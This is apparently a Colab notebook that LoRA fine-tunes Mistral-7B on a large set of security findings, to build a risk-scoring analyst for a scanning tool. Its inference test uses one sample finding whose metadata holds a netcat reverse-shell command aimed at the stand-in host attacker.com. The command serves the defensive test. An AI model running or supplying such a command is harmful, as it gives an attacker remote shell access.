# Sys-Scan Security Model - TPU Fine-Tuning on Massive Dataset

**Runtime**: TPU v3-8 or v4-8  
**Dataset**: 2.5M security findings with LangChain correlations  
**Model**: Base (unmodified) `mistralai/Mistral-7B-Instruct-v0.3` → LoRA fine-tuned security analyst

## Setup Instructions

1. **Runtime**: Runtime → Change runtime type → TPU
2. **Dataset**: Upload `massive_datasets.tar.gz` to Google Drive (`/content/drive/MyDrive/sys-scan/`)
3. **Execute**: Run all cells
4. **Output**: LoRA adapter, tokenizer, and training metadata saved to Drive (`/content/drive/MyDrive/sys-scan/models/mistral-security-final/`)

## 1. Environment Setup

In [None]:
# Check TPU availability
import os
import sys

# Check for TPU
# Sets the notebook-wide USE_TPU flag that later cells branch on.
# torch_xla can be missing entirely (ImportError) or be installed without a
# usable XLA device, in which case the device lookup can raise RuntimeError.
# Both cases mean "no TPU", so neither should abort the notebook.
try:
    import torch_xla
    import torch_xla.core.xla_model as xm
    print(f"✓ TPU detected: {xm.xla_device()}")
    print(f"✓ TPU cores: {xm.xrt_world_size()}")
except (ImportError, RuntimeError):
    print("⚠️  No TPU detected - will use GPU/CPU")
    USE_TPU = False
else:
    # Only reached when both the import and the device queries succeeded.
    USE_TPU = True

In [None]:
%%bash
# Install dependencies
# NOTE: the %%bash cell magic has to be the very first line of the cell,
# otherwise IPython does not treat the cell as a bash script.

# Abort on the first failing command so the success message below is only
# printed when every install actually succeeded.
set -e

pip install -q transformers==4.36.0 datasets==2.15.0 accelerate==0.25.0
pip install -q peft==0.7.0 trl==0.7.9 sentencepiece protobuf
pip install -q bitsandbytes==0.41.3  # For GPU fallback

# TPU-specific (if on TPU): COLAB_TPU_ADDR is non-empty only on TPU runtimes
if [ -n "${COLAB_TPU_ADDR:-}" ]; then
  pip install -q cloud-tpu-client==0.10 torch-xla==2.1.0
fi

echo "✓ Dependencies installed"

In [None]:
# Imports
import torch
import json
import tarfile
import logging
from pathlib import Path
from datetime import datetime
from typing import Iterator, Dict, Any

import transformers
from transformers import (
    AutoTokenizer,
    AutoModelForCausalLM,
    TrainingArguments,
    DataCollatorForLanguageModeling
)
from datasets import Dataset, IterableDataset
from peft import LoraConfig, get_peft_model, prepare_model_for_kbit_training
from trl import SFTTrainer, DataCollatorForCompletionOnlyLM

if USE_TPU:
    import torch_xla.core.xla_model as xm
    import torch_xla.distributed.parallel_loader as pl

# Logging
# Configure the root logger once (INFO level, timestamped records) and create
# the notebook-wide `logger` used by the data-loading code.
logging.basicConfig(
    format='%(asctime)s - %(levelname)s - %(message)s',
    level=logging.INFO,
)
logger = logging.getLogger(__name__)

# Report the library versions in use, one per line.
print(
    f"PyTorch: {torch.__version__}",
    f"Transformers: {transformers.__version__}",
    sep="\n",
)

## 2. Mount Google Drive

In [None]:
from google.colab import drive

# Mount Google Drive at the path that every Drive-based location below uses.
drive.mount('/content/drive')

# Setup paths
# Dataset archive and model output live under the mounted Drive folder;
# the cache and workspace directories are outside the mount.
DRIVE_ROOT = Path('/content/drive/MyDrive/sys-scan')
DATASET_PATH = DRIVE_ROOT.joinpath('massive_datasets.tar.gz')
OUTPUT_DIR = DRIVE_ROOT.joinpath('models', 'mistral-security-final')
CACHE_DIR = Path('/content/cache')
WORK_DIR = Path('/content/workspace')

# Create directories (same order as they are used: output, cache, workspace)
for _required_dir in (OUTPUT_DIR, CACHE_DIR, WORK_DIR):
    _required_dir.mkdir(parents=True, exist_ok=True)

# Status report, one item per line.
print(
    "✓ Drive mounted",
    f"  Dataset: {DATASET_PATH}",
    f"  Output: {OUTPUT_DIR}",
    f"  Dataset exists: {DATASET_PATH.exists()}",
    sep="\n",
)

## 3. Extract and Prepare Massive Dataset

In [None]:
# Extract dataset
# Unpacks the archive into WORK_DIR (skipped when the target directory already
# exists) and collects the JSON files that the data loader will read.
print("Extracting massive dataset...")
EXTRACTED_DIR = WORK_DIR / 'massive_datasets'

if not EXTRACTED_DIR.exists():
    with tarfile.open(DATASET_PATH, 'r:gz') as tar:
        # Use the 'data' extraction filter where this Python version provides
        # it, so archive members cannot write outside WORK_DIR; older
        # interpreters fall back to the unfiltered behaviour.
        if hasattr(tarfile, 'data_filter'):
            tar.extractall(WORK_DIR, filter='data')
        else:
            tar.extractall(WORK_DIR)
    print(f"✓ Extracted to {EXTRACTED_DIR}")
else:
    # NOTE: an interrupted earlier extraction also leaves this directory
    # behind; delete it manually to force a clean re-extraction.
    print(f"✓ Already extracted: {EXTRACTED_DIR}")

# List dataset files
dataset_files = sorted(EXTRACTED_DIR.glob('*.json'))
if not dataset_files:
    # Fail here with an actionable message instead of letting a later cell
    # fail on an empty file list.
    raise FileNotFoundError(
        f"No *.json dataset files found in {EXTRACTED_DIR}; check the archive "
        "layout, or remove a partially extracted directory and re-run this cell."
    )

print(f"\nFound {len(dataset_files)} dataset files")
for f in dataset_files[:5]:
    size_mb = f.stat().st_size / 1024 / 1024
    print(f"  {f.name}: {size_mb:.1f} MB")
if len(dataset_files) > 5:
    print(f"  ... and {len(dataset_files) - 5} more")

## 4. Streaming Data Loader for 2.5M Findings

In [None]:
class MassiveSecurityDataset:
    """Streaming dataset loader for massive security findings.

    Reads the JSON dataset files one at a time and converts every finding
    into a single instruction-formatted training text.
    """

    SYSTEM_PROMPT = """You are a security analysis AI embedded in sys-scan-graph. Analyze security findings and provide risk scoring, correlations, and remediation recommendations. Output valid JSON."""

    def __init__(self, data_files: list, max_examples: int = None):
        """Store the file list and the optional cap on yielded examples.

        Args:
            data_files: Dataset files to read, in order. Each entry must be
                accepted by ``open`` and expose ``.name`` (e.g. ``Path``).
            max_examples: Maximum number of examples to yield across all
                files; ``None`` means no limit.
        """
        self.data_files = data_files
        self.max_examples = max_examples

    def _create_training_example(self, finding: Dict[str, Any]) -> str:
        """Convert finding to instruction-following format.

        Args:
            finding: One finding mapping; missing keys become ``null`` in the
                rendered JSON (``metadata`` defaults to ``{}``, ``tags`` to
                ``[]``).

        Returns:
            The full training text: system turn, instruction turn with the
            input JSON, then the expected output JSON.
        """
        # Input: minimal finding info
        input_data = {
            "id": finding.get("id"),
            "title": finding.get("title"),
            "description": finding.get("description"),
            "metadata": finding.get("metadata", {}),
            "category": finding.get("category")
        }

        # Output: enriched analysis
        output_data = {
            "risk_score": finding.get("risk_score"),
            "severity": finding.get("severity"),
            "risk_subscores": finding.get("risk_subscores"),
            "probability_actionable": finding.get("probability_actionable"),
            "baseline_status": finding.get("baseline_status"),
            "tags": finding.get("tags", []),
            "rationale": finding.get("rationale")
        }

        instruction = "Analyze this security finding and provide risk scoring with subscores (impact, exposure, anomaly, confidence), severity classification, and actionability assessment."

        # Mistral-Instruct format
        # NOTE(review): the text embeds literal <s>/</s> markers; if the
        # tokenizer also prepends BOS at training time this may produce a
        # duplicated BOS token - confirm against the tokenizer settings.
        text = f"""<s>[INST] {self.SYSTEM_PROMPT} [/INST]
[INST] {instruction}

Input:
{json.dumps(input_data, indent=2)}
[/INST]
{json.dumps(output_data, indent=2)}</s>"""

        return text

    @staticmethod
    def _findings_by_category(data: Any):
        """Return the category -> severity-groups mapping of one parsed file.

        Returns ``None`` when the payload does not have the expected mapping
        shape, so the caller can skip the file instead of crashing.
        """
        # Handle nested structure: an optional top-level "data" wrapper
        if isinstance(data, dict) and 'data' in data:
            data = data['data']
        if not isinstance(data, dict):
            return None

        findings = data.get('findings', {})
        return findings if isinstance(findings, dict) else None

    @staticmethod
    def _iter_findings(findings_by_category: Dict[str, Any]) -> Iterator[Any]:
        """Yield every raw finding, ignoring groups that have the wrong type."""
        for severity_groups in findings_by_category.values():
            if not isinstance(severity_groups, dict):
                continue
            for findings_list in severity_groups.values():
                if isinstance(findings_list, list):
                    yield from findings_list

    def stream_examples(self) -> Iterator[Dict[str, str]]:
        """Stream training examples from all files.

        Each file is expected to hold ``{"findings": {category: {severity:
        [finding, ...]}}}``, optionally wrapped in a top-level ``"data"`` key.
        Files or entries that do not match are skipped with a warning.

        Yields:
            ``{"text": <training text>}`` for every usable finding, stopping
            once ``max_examples`` examples were produced (if set).
        """
        limit = self.max_examples
        count = 0

        for file_path in self.data_files:
            # Stop before parsing another (potentially huge) file once the
            # cap is reached. `is not None` keeps max_examples=0 meaning
            # "yield nothing" rather than "unlimited".
            if limit is not None and count >= limit:
                return

            logger.info(f"Loading {file_path.name}...")

            with open(file_path, encoding="utf-8") as f:
                data = json.load(f)

            # Extract all findings
            findings_by_category = self._findings_by_category(data)
            if findings_by_category is None:
                logger.warning(f"Skipping {file_path.name}: unexpected JSON structure")
                continue

            for finding in self._iter_findings(findings_by_category):
                if limit is not None and count >= limit:
                    return

                if not isinstance(finding, dict):
                    logger.warning(f"Skipping non-dict finding in {file_path.name}")
                    continue

                # Only the conversion is guarded; the yield stays outside the
                # try so errors raised by the consumer are never swallowed.
                try:
                    text = self._create_training_example(finding)
                except (TypeError, ValueError) as e:
                    logger.warning(f"Skipping finding {finding.get('id')}: {e}")
                    continue

                yield {"text": text}
                count += 1

                if count % 10000 == 0:
                    logger.info(f"Streamed {count:,} examples...")

        logger.info(f"✓ Streamed {count:,} total examples")

# Test streaming
# Pull a single example to confirm the loader can parse the dataset files.
dataset_loader = MassiveSecurityDataset(dataset_files, max_examples=10)
sample = next(dataset_loader.stream_examples(), None)
if sample is None:
    # Without the default above, an empty stream would surface as a bare
    # StopIteration with no hint about the cause.
    raise ValueError(
        "No training examples could be streamed from the dataset files; "
        "check that they contain the expected 'findings' structure."
    )
print("\nSample training example:")
print(sample['text'][:500] + "...")

## 5. Configuration

In [None]:
# Training configuration optimized for TPU

# Mixed-precision selection: BF16 on TPU and on GPUs that support it, FP16 on
# other CUDA GPUs, full precision on CPU. Requesting BF16 on a GPU without
# BF16 support makes TrainingArguments raise.
CUDA_AVAILABLE = torch.cuda.is_available()
BF16_SUPPORTED = bool(USE_TPU or (CUDA_AVAILABLE and torch.cuda.is_bf16_supported()))

CONFIG = {
    # Model
    "model_name": "mistralai/Mistral-7B-Instruct-v0.3",

    # Data
    "max_examples": None,  # Use all 2.5M (set to smaller number for testing)
    "train_split": 0.95,   # 95% train, 5% eval
    "max_seq_length": 2048,

    # LoRA
    "lora_r": 128,          # Higher rank for massive dataset
    "lora_alpha": 256,
    "lora_dropout": 0.05,
    "lora_targets": ["q_proj", "k_proj", "v_proj", "o_proj",
                     "gate_proj", "up_proj", "down_proj"],

    # Training - TPU optimized
    "num_epochs": 3,
    "per_device_batch_size": 16 if USE_TPU else 4,  # TPU can handle larger batches
    "gradient_accumulation": 2 if USE_TPU else 4,
    "learning_rate": 2e-4,
    "weight_decay": 0.01,
    "warmup_ratio": 0.03,
    "max_grad_norm": 1.0,

    # Precision (see BF16_SUPPORTED above)
    "bf16": BF16_SUPPORTED,
    "fp16": bool(CUDA_AVAILABLE and not BF16_SUPPORTED),

    # Logging & Saving
    "logging_steps": 100,
    "eval_steps": 5000,
    "save_steps": 5000,
    "save_total_limit": 3,

    # Optimization
    "gradient_checkpointing": True,
    "optim": "adafactor" if USE_TPU else "paged_adamw_8bit",
}

# Effective batch size
effective_batch = CONFIG["per_device_batch_size"] * CONFIG["gradient_accumulation"]
if USE_TPU:
    # NOTE(review): assumes all 8 TPU cores take part in data-parallel
    # training - confirm against how the trainer is actually launched.
    effective_batch *= 8  # 8 TPU cores

# Step estimate: honour the example cap (if any) and count only the training
# share of the data, since the eval split is never trained on.
approx_total_examples = 2_500_000 if CONFIG["max_examples"] is None else CONFIG["max_examples"]
approx_train_examples = int(approx_total_examples * CONFIG["train_split"])

print("Training Configuration:")
print(json.dumps(CONFIG, indent=2))
print(f"\nEffective batch size: {effective_batch}")
print(f"Total training steps: ~{(approx_train_examples * CONFIG['num_epochs']) // effective_batch:,}")

## 6. Load Model and Tokenizer

In [None]:
# Load tokenizer
print("Loading tokenizer...")
tokenizer = AutoTokenizer.from_pretrained(
    CONFIG["model_name"],
    cache_dir=str(CACHE_DIR),
    trust_remote_code=True
)

# Set padding token
# Prefer the unknown token over EOS: the language-modeling collator ignores
# every label equal to pad_token_id, so padding with EOS would also remove the
# real end-of-sequence token from the loss and the model would not learn to
# stop. EOS is kept only as a fallback when no unknown token exists.
if tokenizer.pad_token is None:
    if tokenizer.unk_token is not None:
        tokenizer.pad_token = tokenizer.unk_token
    else:
        tokenizer.pad_token = tokenizer.eos_token

# Pad on the right for training (SFTTrainer warns about other settings).
tokenizer.padding_side = "right"

print(f"✓ Tokenizer loaded (vocab: {len(tokenizer):,})")

# Load model
print("\nLoading model (this may take a few minutes)...")

if USE_TPU:
    # TPU: Load in BF16
    model = AutoModelForCausalLM.from_pretrained(
        CONFIG["model_name"],
        cache_dir=str(CACHE_DIR),
        torch_dtype=torch.bfloat16,
        trust_remote_code=True
    )
    if CONFIG["gradient_checkpointing"]:
        # With frozen base weights, checkpointed blocks only propagate
        # gradients to the LoRA adapters if their inputs require grad. The
        # GPU branch gets this from prepare_model_for_kbit_training.
        model.enable_input_require_grads()
else:
    # GPU: Load with 4-bit quantization
    from transformers import BitsAndBytesConfig

    # Compute in BF16 only where the GPU supports it; otherwise use FP16.
    if torch.cuda.is_available() and torch.cuda.is_bf16_supported():
        compute_dtype = torch.bfloat16
    else:
        compute_dtype = torch.float16

    bnb_config = BitsAndBytesConfig(
        load_in_4bit=True,
        bnb_4bit_quant_type="nf4",
        bnb_4bit_compute_dtype=compute_dtype,
        bnb_4bit_use_double_quant=True,
    )

    model = AutoModelForCausalLM.from_pretrained(
        CONFIG["model_name"],
        quantization_config=bnb_config,
        device_map="auto",
        cache_dir=str(CACHE_DIR),
        trust_remote_code=True
    )
    model = prepare_model_for_kbit_training(model, use_gradient_checkpointing=True)

print("✓ Model loaded")

# Apply LoRA
print("\nApplying LoRA adapters...")
peft_config = LoraConfig(
    r=CONFIG["lora_r"],
    lora_alpha=CONFIG["lora_alpha"],
    lora_dropout=CONFIG["lora_dropout"],
    target_modules=CONFIG["lora_targets"],
    bias="none",
    task_type="CAUSAL_LM",
)

# Wrap the base model so only the adapter weights are trainable.
model = get_peft_model(model, peft_config)
model.print_trainable_parameters()

print("✓ LoRA applied")

## 7. Prepare Datasets

In [None]:
# Create streaming dataset
print("Creating streaming dataset...")

dataset_loader = MassiveSecurityDataset(
    dataset_files,
    max_examples=CONFIG["max_examples"]
)


def gen():
    """Yield every training example produced by the global ``dataset_loader``."""
    yield from dataset_loader.stream_examples()


# Build the dataset straight from the generator instead of first collecting
# millions of Python dicts in a list: examples are written to an Arrow-backed
# dataset as they are streamed, which avoids holding several full copies of
# the corpus in RAM next to the model.
# NOTE(review): `from_generator` caches its result; confirm the cache is
# invalidated when the dataset files change.
print("Building dataset from streamed examples...")
full_dataset = Dataset.from_generator(gen)
print(f"✓ Loaded {len(full_dataset):,} examples")

if len(full_dataset) < 2:
    # A split needs at least one example on each side.
    raise ValueError(
        f"Need at least 2 examples to create train/eval splits, got {len(full_dataset)}."
    )

# Shuffle and split (seeded, so the split is reproducible)
splits = full_dataset.train_test_split(
    train_size=CONFIG["train_split"],
    shuffle=True,
    seed=42,
)

# Create datasets
train_dataset = splits["train"]
eval_dataset = splits["test"]

print(f"\n✓ Dataset split:")
print(f"  Train: {len(train_dataset):,} examples")
print(f"  Eval: {len(eval_dataset):,} examples")

## 8. Training Setup

In [None]:
# Training arguments
# Collected in a plain mapping first: CONFIG-driven values, then the fixed
# evaluation/checkpoint/reporting choices.
training_kwargs = {
    "output_dir": str(OUTPUT_DIR),
    # Schedule and batch sizing
    "num_train_epochs": CONFIG["num_epochs"],
    "per_device_train_batch_size": CONFIG["per_device_batch_size"],
    "per_device_eval_batch_size": CONFIG["per_device_batch_size"],
    "gradient_accumulation_steps": CONFIG["gradient_accumulation"],
    # Optimizer
    "learning_rate": CONFIG["learning_rate"],
    "weight_decay": CONFIG["weight_decay"],
    "warmup_ratio": CONFIG["warmup_ratio"],
    "max_grad_norm": CONFIG["max_grad_norm"],
    "optim": CONFIG["optim"],
    "gradient_checkpointing": CONFIG["gradient_checkpointing"],
    # Precision
    "bf16": CONFIG["bf16"],
    "fp16": CONFIG["fp16"],
    # Logging, evaluation and checkpointing cadence
    "logging_steps": CONFIG["logging_steps"],
    "evaluation_strategy": "steps",
    "eval_steps": CONFIG["eval_steps"],
    "save_strategy": "steps",
    "save_steps": CONFIG["save_steps"],
    "save_total_limit": CONFIG["save_total_limit"],
    # Keep the checkpoint with the lowest eval loss
    "load_best_model_at_end": True,
    "metric_for_best_model": "eval_loss",
    "greater_is_better": False,
    # Reporting and reproducibility
    "report_to": ["tensorboard"],
    "logging_dir": str(OUTPUT_DIR / "logs"),
    "seed": 42,
}
training_args = TrainingArguments(**training_kwargs)

# Data collator - only compute loss on assistant responses
# (everything up to and including the response template is excluded)
response_template = "[/INST]"
collator = DataCollatorForCompletionOnlyLM(
    tokenizer=tokenizer,
    response_template=response_template,
    mlm=False,
)

# Create trainer
trainer = SFTTrainer(
    model=model,
    tokenizer=tokenizer,
    args=training_args,
    data_collator=collator,
    train_dataset=train_dataset,
    eval_dataset=eval_dataset,
    dataset_text_field="text",
    max_seq_length=CONFIG["max_seq_length"],
    packing=False,
)

print("✓ Trainer initialized")

## 9. Train Model

In [None]:
# Start training
# Print a banner with the run parameters, time the training call, then print
# a closing banner. start_time / end_time / duration are reused by later cells.
rule = "=" * 80
print(
    rule,
    "STARTING TRAINING",
    rule,
    f"Training on {len(train_dataset):,} examples",
    f"Evaluating on {len(eval_dataset):,} examples",
    f"Total epochs: {CONFIG['num_epochs']}",
    f"Effective batch size: {effective_batch}",
    rule,
    sep="\n",
)

start_time = datetime.now()
print(f"Start time: {start_time}\n")

# Train
trainer.train()

end_time = datetime.now()
duration = end_time - start_time

print(
    "\n" + rule,
    "TRAINING COMPLETED",
    rule,
    f"End time: {end_time}",
    f"Duration: {duration}",
    rule,
    sep="\n",
)

## 10. Final Evaluation

In [None]:
# Final evaluation
# Run one evaluation pass, print each metric with four decimals, and persist
# the raw metric mapping as JSON in the output directory.
print("Running final evaluation...")
eval_results = trainer.evaluate()

print("\nEvaluation Results:")
for metric_name in eval_results:
    print(f"  {metric_name}: {eval_results[metric_name]:.4f}")

# Save results
results_path = OUTPUT_DIR / "eval_results.json"
results_path.write_text(json.dumps(eval_results, indent=2))

print(f"\n✓ Results saved to {results_path}")

## 11. Save Final Model to Google Drive

In [None]:
# Save model and tokenizer
# Write the trained weights, the tokenizer, the training configuration and a
# short run summary into OUTPUT_DIR, then list the files found there.
print("Saving final model to Google Drive...")
print(f"Location: {OUTPUT_DIR}")

output_dir_str = str(OUTPUT_DIR)
trainer.save_model(output_dir_str)
tokenizer.save_pretrained(output_dir_str)

# Save training config
(OUTPUT_DIR / "training_config.json").write_text(json.dumps(CONFIG, indent=2))

# Save training summary (timings and sizes come from the earlier cells)
summary = dict(
    start_time=start_time.isoformat(),
    end_time=end_time.isoformat(),
    duration_seconds=duration.total_seconds(),
    train_examples=len(train_dataset),
    eval_examples=len(eval_dataset),
    final_eval_loss=eval_results.get("eval_loss"),
    use_tpu=USE_TPU,
)
(OUTPUT_DIR / "training_summary.json").write_text(json.dumps(summary, indent=2))

print("\n✓ Model saved successfully!")
print("\nSaved files:")
# Only regular files directly inside OUTPUT_DIR are listed, sorted by path.
saved_files = [entry for entry in sorted(OUTPUT_DIR.glob("*")) if entry.is_file()]
for saved in saved_files:
    print(f"  {saved.name}: {saved.stat().st_size / 1024 / 1024:.1f} MB")

## 12. Test Inference

In [None]:
# Test the trained model
# Build one hand-written finding, format it like the training examples,
# sample a completion and print only the generated part.
test_finding = {
    "id": "test_001",
    "title": "Suspicious process execution",
    "description": "Process /usr/bin/python3 executing with unusual command line arguments",
    "metadata": {
        "pid": 12345,
        "command": "/usr/bin/python3 -c 'import os; os.system(\"nc -e /bin/bash attacker.com 4444\")'",
        "user": "www-data",
        "ppid": 1000
    },
    "category": "processes"
}

# Reuse the exact system prompt from training so the inference prompt matches
# the format the model was fine-tuned on.
prompt = f"""<s>[INST] {MassiveSecurityDataset.SYSTEM_PROMPT} [/INST]
[INST] Analyze this security finding and provide risk scoring with subscores (impact, exposure, anomaly, confidence), severity classification, and actionability assessment.

Input:
{json.dumps(test_finding, indent=2)}
[/INST]
"""

# Pick the device the inputs must be moved to (the model itself is not moved)
if USE_TPU:
    device = xm.xla_device()
else:
    device = model.device

# Inference mode: disables dropout (including the LoRA dropout layers).
model.eval()

inputs = tokenizer(prompt, return_tensors="pt").to(device)
# Remember the prompt length so the echoed prompt can be cut from the output.
prompt_length = inputs["input_ids"].shape[1]

print("Generating response...")
with torch.no_grad():
    outputs = model.generate(
        **inputs,
        max_new_tokens=512,
        temperature=0.7,
        do_sample=True,
        pad_token_id=tokenizer.eos_token_id
    )

# generate() returns prompt + continuation; decode only the new tokens so the
# section below really shows the model's response.
response = tokenizer.decode(outputs[0][prompt_length:], skip_special_tokens=True)

print("\n" + "="*80)
print("MODEL RESPONSE:")
print("="*80)
print(response)
print("="*80)

## Summary

✓ Model trained on 2.5M security findings  
✓ Saved to Google Drive: `/content/drive/MyDrive/sys-scan/models/mistral-security-final/`  
✓ Ready for deployment in sys-scan-graph

### Next Steps

1. Download model from Google Drive
2. Integrate with sys-scan-graph agent
3. Test on real security scans
4. Monitor performance and iterate